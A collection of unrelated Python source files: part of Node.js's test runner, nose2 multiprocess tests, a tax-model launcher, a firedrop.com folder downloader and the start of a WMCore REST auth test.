self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left= Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print("Malformed expression: '%s'" % expr)
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print("Malformed expression: '%s'" % expr)
return None
if scan.HasMore():
print("Malformed expression: '%s'" % expr)
return None
return ast
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [ s for s in self.sections if s.condition.Evaluate(env, self.defs) ]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = []
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes_list = [ r.GetOutcomes(env, self.defs) for r in matches ]
outcomes = reduce(set.union, outcomes_list, set())
unused_rules.difference_update(matches)
case.outcomes = set(outcomes) or set([PASS])
# slow tests may also just pass.
if SLOW in case.outcomes:
case.outcomes.add(PASS)
result.append(case)
return result, unused_rules
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
return self.value.GetOutcomes(env, defs)
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in range(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w_.\-/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
raise Exception("Malformed line: '%s'." % line)
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option('--logfile', dest='logfile',
help='write test output to file. NOTE: this only applies the tap progress indicator')
result.add_option("-p", "--progress",
help="The style of progress indicator (%s)" % ", ".join(PROGRESS_INDICATORS.keys()),
choices=list(PROGRESS_INDICATORS.keys()), default="mono")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=120, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--special-command", default=None)
result.add_option("--node-args", dest="node_args", help="Args to pass through to Node",
default=[], action="append")
result.add_option("--expect-fail", dest="expect_fail",
help="Expect test cases to fail", default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--worker", help="Run parallel tests inside a worker context",
default=False, action="store_true")
result.add_option("--check-deopts", help="Check tests for permanent deoptimizations",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--flaky-tests",
help="Regard tests marked as flaky (run|skip|dontcare)",
default="run")
result.add_option("--skip-tests",
help="Tests that should not be executed (comma-separated)",
default="")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("-J", help="Run tasks in parallel on all cores",
default=False, action="store_true")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to node executable", default=None)
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("-r", "--run",
help="Divide the tests in m groups (interleaved) and run tests from group n (--run=n,m with n < m)",
default="")
result.add_option('--temp-dir',
help='Optional path to change directory used for tests', default=False)
result.add_option('--test-root',
help='Optional path to change test directory', dest='test_root', default=None)
result.add_option('--repeat',
help='Number of times to repeat given tests',
default=1, type="int")
result.add_option('--abort-on-timeout',
help='Send SIGABRT instead of SIGTERM to kill processes that time out',
default=False, action="store_true", dest="abort_on_timeout")
result.add_option("--type",
help="Type of build (simple, fips, coverage)",
default=None)
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.arch = options.arch.split(',')
options.mode = options.mode.split(',')
options.run = options.run.split(',')
# Split at commas and filter out all the empty strings.
options.skip_tests = [test for test in options.skip_tests.split(',') if test]
if options.run == [""]:
options.run = None
elif len(options.run) != 2:
print("The run argument must be two comma-separated integers.")
return False
else:
try:
options.run = [int(level) for level in options.run]
except ValueError:
print("Could not parse the integers from the run argument.")
return False
if options.run[0] < 0 or options.run[1] < 0:
print("The run argument cannot have negative integers.")
return False
if options.run[0] >= options.run[1]:
print("The test group to run (n) must be smaller than number of groups (m).")
return False
if options.J:
# inherit JOBS from environment if provided. some virtualised systems
# tends to exaggerate the number of available cpus/cores.
cores = os.environ.get('JOBS')
options.j = int(cores) if cores is not None else multiprocessing.cpu_count()
if options.flaky_tests not in [RUN, SKIP, DONTCARE]:
print("Unknown flaky-tests mode %s" % options.flaky_tests)
return False
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(path_arg):
stripped = [c.strip() for c in path_arg.split('/')]
return [Pattern(s) for s in stripped if len(s) > 0]
def NormalizePath(path, prefix='test/'):
# strip the extra path information of the specified test
prefix = prefix.replace('\\', '/')
path = path.replace('\\', '/')
if path.startswith(prefix):
path = path[len(prefix):]
if path.endswith('.js'):
path = path[:-3]
elif path.endswith('.mjs'):
path = path[:-4]
return path
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
prefix, _, suffix = value.partition('@')
prefix = unquote(prefix).split()
suffix = unquote(suffix).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def FormatTimedelta(td):
if hasattr(td, 'total_seconds'):
d = td.total_seconds()
else: # python2.6 compat
d = td.seconds + (td.microseconds / 10.0**6)
return FormatTime(d)
def PrintCrashed(code):
if utils.IsWindows():
return "CRASHED"
else:
return "CRASHED (Signal: %d)" % -code
# these suites represent special cases that should not be run as part of the
# default JavaScript test-run, e.g., internet/ requires a network connection,
# addons/ requires compilation.
IGNORED_SUITES = [
'addons',
'benchmark',
'doctool',
'embedding',
'internet',
'js-native-api',
'node-api',
'pummel',
'tick-processor',
'v8-updates'
]
def ArgsToTestPaths(test_root, args, suites):
if len(args) == 0 or 'default' in args:
def_suites = [s for s in suites if s not in IGNORED_SUITES]
args = [a for a in args if a != 'default'] + def_suites
subsystem_regex = re.compile(r'^[a-zA-Z-]*$')
check = lambda arg: subsystem_regex.match(arg) and (arg not in suites)
mapped_args = ["*/test*-%s-*" % arg if check(arg) else arg for arg in args]
paths = [SplitPath(NormalizePath(a)) for a in mapped_args]
return paths
def get_env_type(vm, options_type, context):
if options_type is not None:
env_type = options_type
else:
# 'simple' is the default value for 'env_type'.
env_type = 'simple'
ssl_ver = Execute([vm, '-p', 'process.versions.openssl'], context).stdout
if 'fips' in ssl_ver:
env_type = 'fips'
return env_type
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
logger.setLevel(logging.INFO)
if options.logfile:
fh = logging.FileHandler(options.logfile, encoding='utf-8', mode='w')
logger.addHandler(fh)
workspace = abspath(join(dirname(sys.argv[0]), '..'))
test_root = join(workspace, 'test')
if options.test_root is not None:
test_root = options.test_root
suites = GetSuites(test_root)
repositories = [TestRepository(join(test_root, name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories, test_root)
paths = ArgsToTestPaths(test_root, args, suites)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
if options.check_deopts:
options.node_args.append("--trace-opt")
options.node_args.append("--trace-file-names")
# --always-opt is needed because many tests do not run long enough for the
# optimizer to kick in, so this flag will force it to run.
options.node_args.append("--always-opt")
options.progress = "deopts"
if options.worker:
run_worker = join(workspace, "tools", "run-worker.js")
options.node_args.append(run_worker)
processor = GetSpecialCommandProcessor(options.special_command)
context = Context(workspace,
VERBOSE,
options.shell,
options.node_args,
options.expect_fail,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output,
options.repeat,
options.abort_on_timeout)
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for arch in options.arch:
for mode in options.mode:
vm = context.GetVm(arch, mode)
if not exists(vm):
print("Can't find shell executable: '%s'" % vm)
continue
archEngineContext = Execute([vm, "-p", "process.arch"], context)
vmArch = archEngineContext.stdout.rstrip()
if archEngineContext.exit_code != 0 or vmArch == "undefined":
print("Can't determine the arch of: '%s'" % vm)
print(archEngineContext.stderr.rstrip())
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': vmArch,
'type': get_env_type(vm, options.type, context),
}
test_list = root.ListTests([], path, context, arch, mode)
unclassified_tests += test_list
cases, unused_rules = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = (
globally_unused_rules.intersection(unused_rules))
all_cases += cases
all_unused.append(unused_rules)
# We want to skip the inspector tests if node was built without the inspector.
has_inspector = Execute([vm,
'-p', 'process.features.inspector'], context)
if has_inspector.stdout.rstrip() == 'false':
context.v8_enable_inspector = False
has_crypto = Execute([vm,
'-p', 'process.versions.openssl'], context)
if has_crypto.stdout.rstrip() == 'undefined':
context.node_has_crypto = False
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print("--- begin source: %s ---" % test.GetLabel())
source = test.GetSource().strip()
print(source)
print("--- end source: %s ---" % test.GetLabel())
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print("Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path]))
tempdir = os.environ.get('NODE_TEST_DIR') or options.temp_dir
if tempdir:
os.environ['NODE_TEST_DIR'] = tempdir
try:
os.makedirs(tempdir)
except OSError as exception:
if exception.errno != errno.EEXIST:
print("Could not create the temporary directory", options.temp_dir)
sys.exit(1)
def should_keep(case):
if any((s in case.file) for s in options.skip_tests):
return False
elif SKIP in case.outcomes:
return False
elif (options.flaky_tests == SKIP) and (set([SLOW, FLAKY]) & case.outcomes):
return False
else:
return True
cases_to_run = [
test_case for test_case in all_cases if should_keep(test_case)
]
if options.report:
print(REPORT_TEMPLATE % {
'total': len(all_cases),
'skipped': len(all_cases) - len(cases_to_run),
'pass': len([t for t in cases_to_run if PASS in t.outcomes]),
'fail_ok': len([t for t in cases_to_run if t.outcomes == set([FAIL, OKAY])]),
'fail': len([t for t in cases_to_run if t.outcomes == set([FAIL])])
})
if options.run is not None:
# Must ensure the list of tests is sorted before selecting, to avoid
# silent errors if this file is changed to list the tests in a way that
# can be different in different machines
cases_to_run.sort(key=lambda c: (c.arch, c.mode, c.file))
cases_to_run = [ cases_to_run[i] for i
in range(options.run[0],
len(cases_to_run),
options.run[1]) ]
if len(cases_to_run) == 0:
print("No tests to run.")
return 1
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j, options.flaky_tests):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print("Interrupted")
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print()
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t for t in cases_to_run if not t.duration is None ]
timed_tests.sort(key=lambda x: x.duration)
for i, entry in enumerate(timed_tests[:20], start=1):
t = FormatTimedelta(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (i, t, entry.GetLabel()))
return result
if __name__ == '__main__':
sys.exit(Main())
|
proc_multi.py
|
from multiprocessing import Process
def f(name):
print("hello", name)
p = Process(target=f, args=("Bob",))
p.start()
p.join()
|
test_mp_plugin.py
|
import sys
from nose2 import session
from nose2.plugins.mp import MultiProcess, procserver
from nose2.plugins import buffer
from nose2.plugins.loader import discovery, testcases
from nose2.tests._common import FunctionalTestCase, support_file, Conn
from six.moves import queue
import multiprocessing
import threading
import time
import unittest
from multiprocessing import connection
class TestMpPlugin(FunctionalTestCase):
def setUp(self):
super(TestMpPlugin, self).setUp()
self.session = session.Session()
self.plugin = MultiProcess(session=self.session)
def test_flatten_without_fixtures(self):
sys.path.append(support_file('scenario/slow'))
import test_slow as mod
suite = unittest.TestSuite()
suite.addTest(mod.TestSlow('test_ok'))
suite.addTest(mod.TestSlow('test_fail'))
suite.addTest(mod.TestSlow('test_err'))
flat = list(self.plugin._flatten(suite))
self.assertEqual(len(flat), 3)
def test_flatten_nested_suites(self):
sys.path.append(support_file('scenario/slow'))
import test_slow as mod
suite = unittest.TestSuite()
suite.addTest(mod.TestSlow('test_ok'))
suite.addTest(mod.TestSlow('test_fail'))
suite.addTest(mod.TestSlow('test_err'))
suite2 = unittest.TestSuite()
suite2.addTest(suite)
flat = list(self.plugin._flatten(suite2))
self.assertEqual(len(flat), 3)
def test_flatten_respects_module_fixtures(self):
sys.path.append(support_file('scenario/module_fixtures'))
import test_mf_testcase as mod
suite = unittest.TestSuite()
suite.addTest(mod.Test('test_1'))
suite.addTest(mod.Test('test_2'))
flat = list(self.plugin._flatten(suite))
self.assertEqual(flat, ['test_mf_testcase'])
def test_flatten_respects_class_fixtures(self):
sys.path.append(support_file('scenario/class_fixtures'))
import test_cf_testcase as mod
suite = unittest.TestSuite()
suite.addTest(mod.Test('test_1'))
suite.addTest(mod.Test('test_2'))
suite.addTest(mod.Test2('test_1'))
suite.addTest(mod.Test2('test_2'))
suite.addTest(mod.Test3('test_3'))
flat = list(self.plugin._flatten(suite))
self.assertEqual(flat, ['test_cf_testcase.Test2.test_1',
'test_cf_testcase.Test2.test_2',
'test_cf_testcase.Test',
'test_cf_testcase.Test3',
])
def test_conn_prep(self):
self.plugin.bind_host = None
(parent_conn, child_conn) = self.plugin._prepConns()
(parent_pipe, child_pipe) = multiprocessing.Pipe()
self.assertIsInstance(parent_conn, type(parent_pipe))
self.assertIsInstance(child_conn, type(child_pipe))
self.plugin.bind_host = "127.0.0.1"
self.plugin.bind_port = 0
(parent_conn, child_conn) = self.plugin._prepConns()
self.assertIsInstance(parent_conn, connection.Listener)
self.assertIsInstance(child_conn, tuple)
self.assertEqual(parent_conn.address, child_conn[:2])
def test_conn_accept(self):
(parent_conn, child_conn) = multiprocessing.Pipe()
self.assertEqual(self.plugin._acceptConns(parent_conn), parent_conn)
listener = connection.Listener(('127.0.0.1', 0))
with self.assertRaises(RuntimeError):
self.plugin._acceptConns(listener)
def fake_client(address):
client = connection.Client(address)
time.sleep(10)
client.close()
t = threading.Thread(target=fake_client, args=(listener.address,))
t.start()
conn = self.plugin._acceptConns(listener)
self.assertTrue(hasattr(conn, "send"))
self.assertTrue(hasattr(conn, "recv"))
class TestProcserver(FunctionalTestCase):
def setUp(self):
super(TestProcserver, self).setUp()
self.session = session.Session()
def test_dispatch_tests_receive_events(self):
ssn = {
'config': self.session.config,
'verbosity': 1,
'startDir': support_file('scenario/tests_in_package'),
'topLevelDir': support_file('scenario/tests_in_package'),
'logLevel': 100,
'pluginClasses': [discovery.DiscoveryLoader,
testcases.TestCaseLoader,
buffer.OutputBufferPlugin]
}
conn = Conn(['pkg1.test.test_things.SomeTests.test_ok',
'pkg1.test.test_things.SomeTests.test_failed'])
procserver(ssn, conn)
# check conn calls
expect = [('pkg1.test.test_things.SomeTests.test_ok',
[('startTest', {}),
('setTestOutcome', {'outcome': 'passed'}),
('testOutcome', {'outcome': 'passed'}),
('stopTest', {})]
),
('pkg1.test.test_things.SomeTests.test_failed',
[('startTest', {}),
('setTestOutcome', {
'outcome': 'failed',
'expected': False,
'metadata': {'stdout': '-------------------- >> begin captured stdout << ---------------------\nHello stdout\n\n--------------------- >> end captured stdout << ----------------------'}}),
('testOutcome', {
'outcome': 'failed',
'expected': False,
'metadata': {'stdout': '-------------------- >> begin captured stdout << ---------------------\nHello stdout\n\n--------------------- >> end captured stdout << ----------------------'}}),
('stopTest', {})]
),
]
for val in conn.sent:
if val is None:
break
test, events = val
exp_test, exp_events = expect.pop(0)
self.assertEqual(test, exp_test)
for method, event in events:
exp_meth, exp_attr = exp_events.pop(0)
self.assertEqual(method, exp_meth)
for attr, val in exp_attr.items():
self.assertEqual(getattr(event, attr), val)
class MPPluginTestRuns(FunctionalTestCase):
def test_tests_in_package(self):
proc = self.runIn(
'scenario/tests_in_package',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2')
self.assertTestRunOutputMatches(proc, stderr='Ran 25 tests')
self.assertEqual(proc.poll(), 1)
def test_package_in_lib(self):
proc = self.runIn(
'scenario/package_in_lib',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2')
self.assertTestRunOutputMatches(proc, stderr='Ran 3 tests')
self.assertEqual(proc.poll(), 1)
def test_module_fixtures(self):
proc = self.runIn(
'scenario/module_fixtures',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2')
self.assertTestRunOutputMatches(proc, stderr='Ran 5 tests')
self.assertEqual(proc.poll(), 0)
def test_class_fixtures(self):
proc = self.runIn(
'scenario/class_fixtures',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2')
self.assertTestRunOutputMatches(proc, stderr='Ran 7 tests')
self.assertEqual(proc.poll(), 0)
def test_large_number_of_tests_stresstest(self):
proc = self.runIn(
'scenario/many_tests',
'-v',
'--plugin=nose2.plugins.mp',
'--plugin=nose2.plugins.loader.generators',
'-N=1')
self.assertTestRunOutputMatches(proc, stderr='Ran 600 tests')
self.assertEqual(proc.poll(), 0)
def test_socket_stresstest(self):
proc = self.runIn(
'scenario/many_tests_socket',
'-v',
'-c scenario/many_test_socket/nose2.cfg',
'--plugin=nose2.plugins.mp',
'--plugin=nose2.plugins.loader.generators',
'-N=1')
self.assertTestRunOutputMatches(proc, stderr='Ran 600 tests')
self.assertEqual(proc.poll(), 0)
def test_too_many_procs(self):
# Just need to run the mp plugin with less tests than
# processes.
proc = self.runModuleAsMain('scenario/one_test/tests.py',
'--log-level=debug',
'--plugin=nose2.plugins.mp',
'-N=2')
ret_vals = queue.Queue()
def save_return():
"""
Popen.communciate() blocks. Use a thread-safe queue
to return any exceptions. Ideally, this completes
and returns None.
"""
try:
self.assertTestRunOutputMatches(proc,
stderr='Ran 1 test')
self.assertEqual(proc.poll(), 0)
ret_vals.put(None)
except Exception as exc:
ret_vals.put(exc)
thread = threading.Thread(target=save_return)
thread.start()
# 1 minute should be more than sufficent for this
# little test case.
try:
exc = ret_vals.get(True, 60)
except queue.Empty:
exc = "MP Test timed out"
proc.kill()
self.assertIsNone(exc, str(exc))
def test_with_output_buffer(self):
proc = self.runIn(
'scenario/module_fixtures',
'-v',
'--plugin=nose2.plugins.mp',
'--plugin=nose2.plugins.buffer',
'-N=2',
'-B',
)
self.assertTestRunOutputMatches(proc, stderr='Ran 5 tests')
self.assertEqual(proc.poll(), 0)
def test_unknown_module(self):
proc = self.runIn(
'scenario/module_fixtures',
'-v',
'--plugin=nose2.plugins.mp',
'-N=2',
'-B',
'does.not.exists.module',
'does.not.exists.module2'
)
expected_results = (
r"does\.not\.exists\.module2 (\S+) \.\.\. ERROR\n"
r"does\.not\.exists\.module (\S+) \.\.\. ERROR"
)
self.assertTestRunOutputMatches(proc, stderr=expected_results)
self.assertEqual(proc.poll(), 1)
|
run_ogusa.py
|
import ogusa
import os
import sys
from multiprocessing import Process
import time
#OGUSA_PATH = os.environ.get("OGUSA_PATH", "../../ospc-dynamic/dynamic/Python")
#sys.path.append(OGUSA_PATH)
from ogusa.scripts import postprocess
#from execute import runner # change here for small jobs
from ogusa.scripts.execute_large import runner
from ogusa.utils import REFORM_DIR, BASELINE_DIR
def run_micro_macro(user_params):
reform = {
2015: {
'_II_rt1': [.09],
'_II_rt2': [.135],
'_II_rt3': [.225],
'_II_rt4': [.252],
'_II_rt5': [.297],
'_II_rt6': [.315],
'_II_rt7': [0.3564],
}, }
start_time = time.time()
output_base = REFORM_DIR
input_dir = REFORM_DIR
kwargs={'output_base':output_base, 'input_dir':input_dir,
'baseline':False, 'analytical_mtrs':False, 'reform':reform,
'user_params':user_params,'guid':'42', 'run_micro':False}
p1 = Process(target=runner, kwargs=kwargs)
p1.start()
#runner(**kwargs)
# output_base = BASELINE_DIR
# input_dir = BASELINE_DIR
# kwargs={'output_base':output_base, 'input_dir':input_dir,
# 'baseline':True, 'analytical_mtrs':True, 'user_params':user_params,
# 'guid':'42','run_micro':False}
# p2 = Process(target=runner, kwargs=kwargs)
# p2.start()
# p1.join()
# print "just joined"
# p2.join()
# time.sleep(0.5)
# ans = postprocess.create_diff(baseline=BASELINE_DIR, policy=REFORM_DIR)
# print "total time was ", (time.time() - start_time)
# print ans
# return ans
if __name__ == "__main__":
run_micro_macro(user_params={})
|
firedrop_script.py
|
import urllib2
import mechanize
from bs4 import BeautifulSoup
import cookielib
import time
import re
import requests
from requests import Request, Session
from tqdm import tqdm
from threading import Thread
import Queue
import argparse
def run(enter_url,enter_filename,enter_pw):
print 'Welcome to firedrop file getter'
print '--------------------------------'
scrape_pages(enter_url,enter_filename,enter_pw)
def scrape_pages(enter_url,enter_filename,enter_pw):
#setup our instance variables.
cj = cookielib.CookieJar()
br = mechanize.Browser()
br.set_cookiejar(cj)
#browser methods (we get input from user input)
#note br.form is coupled to firedrop.com
br.open(enter_url)
br.select_form(nr=0)
br.form['folderPassword'] = enter_pw
br.submit()
#read the inital 'link page' and copy the response (this is the page with all the download links).
first_resp = br.response().read()
soup = BeautifulSoup(first_resp, 'html.parser')
#a quick little password check that checks the response page for the given filename text
if enter_filename not in soup.text:
print '---Sorry, Incorrect Password. Quiting...'
raise SystemExit
else:
print '---Password Successful!'
mainpage_links = []
mainpage_links_name = []
for link in soup.find_all('a',href=True):
if enter_filename in link.text:
print 'Copying mainpage link...',link
mainpage_links.append(link['href'])
mainpage_links_name.append(link.text)
print 'Copying mainpage links complete!'
#then we open an individual link (which takes us to the download page of that file).
#note: this is done once. Basically first we parse the main page for links,
#then we open every mainlink to get the actual file link, but we don't download yet.
download_urls = []
print 'Opening mainpage links and finding file download URLs...'
for page in mainpage_links:
#here we need to parse the final dl page for the actual file url.
download_page = urllib2.urlopen(page)
new_soup = BeautifulSoup(download_page.read(), 'html.parser')
script = new_soup.find_all('script')
script_bit = ''
for item in script:
if 'Download File' in item.text:
script_bit = item.text
pattern = re.compile("(\w+)='(.*?)'")
fields = dict(re.findall(pattern, script_bit))
print 'Copying file download URL...',fields['href']
#append the actual download file url to a list.
download_urls.append(fields['href'])
thread_queue(download_urls, mainpage_links_name)
def download(i,q,counter, file):
while True:
print '%s: Looking at next URL...' % i
url = q.get()
print '%s: Downloading:' % i, url
#download
file_name = file[counter]
counter += 1
#first HTTP request.
res = requests.get(url,stream=False)
#get header/cookie info.
#decouple this later.
pattern = re.compile("(\w+)")
fields = re.findall(pattern, url)
short_url = 'https://firedrop.com/' + fields[3]
cookie = res.headers['Set-Cookie']
#post second HTTP request with cookie stuff.
#this is a custom request so that firedrop will serve the file.
s = Session()
req = Request('POST',url)
prepped = s.prepare_request(req)
prepped.headers['Host'] = 'firedrop.com'
prepped.headers['Connection'] = 'Keep-Alive'
prepped.headers['Accept-Encoding'] = 'gzip, deflate, sdch'
prepped.headers['Accept'] = '*/*'
prepped.headers['Upgrade-Insecure-Requests'] = '1'
prepped.headers['DNT'] = '1'
prepped.headers['Referer'] = short_url
prepped.headers['Cookie'] = cookie + ';, jstree_open=%23-1;, jstree_load=;, jstree_select=%233530'
#note this timer is vital (response.js will not serve file without the delay)
print 'Preparing file download... (Takes 10sec)'
time.sleep(10)
#download - GET second HTTP response.
file_resp = s.send(prepped, stream=True)
#write file.
#problem here for large files, this needs to be iter_content or else it won't DL.
print '---Downloading file: ', file_name
with open(file_name,'wb') as code:
for data in tqdm(file_resp.iter_content(512)):
code.write(data)
q.task_done()
def thread_queue(download_urls, mainpage_links_name):
#setup our queue.
#multithread option.
num_threads = 1
enclosed_q = Queue.Queue()
counter = 0
for i in range(num_threads):
dae = Thread(target=download, args=(i, enclosed_q, counter, mainpage_links_name))
dae.setDaemon(True)
dae.start()
for url in download_urls:
enclosed_q.put(url)
enclosed_q.join()
print '\n---------- DONE ----------'
if __name__ == "__main__":
# Setup args.
parser = argparse.ArgumentParser()
parser.add_argument('url',help='The main firedrop folder URL')
parser.add_argument('filename',help='Part of the actual filename(s) of files you want to download')
parser.add_argument('password',help='The folder password')
args = parser.parse_args()
run(args.url,args.filename,args.password)
|
Simple_t.py
|
# system modules
import cherrypy
from cheroot.test import webtest
from cherrypy import expose
from multiprocessing import Process
# WMCore modules
from WMCore.REST.Auth import user_info_from_headers
from WMCore.REST.Test import setup_dummy_server, fake_authz_headers
from WMCore.REST.Test import fake_authz_key_file
from WMCore.REST.Tools import tools
FAKE_FILE = fake_authz_key_file()
PORT = 8888
class Root:
def __init__(self, *args):
pass
@expose
def default(self):
return "foo"
@expose
@tools.cms_auth(role = "Global Admin", group = "global")
def global_admin(self):
return "ok"
class SimpleTest(webtest.WebCase):
def setUp(self):
self.h = fake_authz_headers(FAKE_FILE.data)
self.hglobal = fake_authz_headers(FAKE_FILE.data, roles = {"Global Admin": {'group': ['global']}})
webtest.WebCase.PORT = PORT
self.engine = cherrypy.engine
self.proc = load_server(self.engine)
def tearDown(self):
stop_server(self.proc, self.engine)
def test_basic_fail(self):
self.getPage("/test")
self.assertStatus("403 Forbidden")
def test_basic_success(self):
self.getPage("/test", headers = self.h)
